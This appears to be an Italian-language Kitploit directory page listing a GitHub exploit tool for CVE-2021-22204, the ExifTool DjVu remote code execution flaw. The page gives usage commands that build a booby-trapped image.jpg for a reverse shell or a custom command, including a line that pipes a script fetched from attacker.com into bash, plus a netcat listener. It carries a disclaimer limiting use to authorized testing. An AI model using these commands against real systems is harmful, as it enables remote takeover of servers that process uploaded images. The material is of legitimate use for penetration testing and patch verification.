Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-22204 — Exploit RCE per ExifTool (CVE-2021-22204) - versione migliorata, nessuna dipendenza da exiftool | Kitploit
Strumenti/GitHubGitHub/d4ytox/cve-2021-22204
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubd4ytox/cve-2021-22204

CVE-2021-22204

Exploit RCE per ExifTool (CVE-2021-22204) - versione migliorata, nessuna dipendenza da exiftool

Vedi Repository
2 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-22204 - Esecuzione di codice arbitrario in ExifTool

Un exploit aggiornato per CVE-2021-22204, una vulnerabilità in ExifTool versioni 7.44 fino a 12.23 che consente l'esecuzione di codice arbitrario durante l'elaborazione di file DjVu dannosi.

Descrizione

La neutralizzazione impropria dei dati dell'utente nel formato di file DjVu in ExifTool versioni 7.44 a 12.23 consente l'esecuzione di codice arbitrario durante l'analisi di un'immagine dannosa. Questo exploit genera un file immagine dannoso che, quando elaborato da una versione vulnerabile di ExifTool, esegue codice controllato dall'attaccante.

Miglioramenti rispetto all'originale

Questa è una versione aggiornata ispirata da UNICORDev/exploit-CVE-2021-22204, con i seguenti miglioramenti:

  • Nessuna dipendenza da ExifTool sulla macchina dell'attaccante - L'exploit originale usa exiftool -config per incorporare il payload, che fallisce se il tuo ExifTool è patchato (v12.24+). Questa versione crea un payload DjVu puro usando solo djvumake.
  • Funziona su Kali moderno - Compatibile con Python 3.12+ (corregge l'avviso di sequenza di escape \c)
  • Dipendenze minime - Richiede solo il pacchetto djvulibre-bin
  • Codice pulito e minimale - Nessuna ASCII art o ritardi artificiali

Requisiti

root@kitploit:~
sudo apt install djvulibre-bin

Utilizzo

Reverse Shell:

root@kitploit:~
python3 exploit.py -s <LHOST> <LPORT>

Comando personalizzato:

root@kitploit:~
python3 exploit.py -c "id > /tmp/pwned"

Esempi:

root@kitploit:~
# Genera payload per reverse shell
python3 exploit.py -s 192.168.1.100 4444

# Genera payload per esecuzione comandi  
python3 exploit.py -c "curl http://attacker.com/shell.sh | bash"

# Avvia listener e attendi connessione
nc -nlvp 4444

L'exploit genera image.jpg - carica questo file su un target dove ExifTool lo elaborerà.

Versioni interessate

  • ExifTool 7.44 - 12.23

Riferimenti

  • CVE-2021-22204
  • ExifTool Advisory
  • Original UNICORD Exploit

Avvertenza

Questo strumento è fornito solo a scopo di test di sicurezza educativi e autorizzati.

L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento. Utilizza questo exploit solo contro sistemi di tua proprietà o per i quali hai esplicito permesso scritto per testarli.

L'accesso non autorizzato a sistemi informatici è illegale e punibile per legge. Utilizza responsabilmente.

Licenza

Licenza MIT - Vedi file LICENSE.

Crediti

  • Concetto originale dell'exploit di UNICORD (NicPWNs & Dev-Yeoj)
  • Versione aggiornata da d4ytox
Scarica lo strumento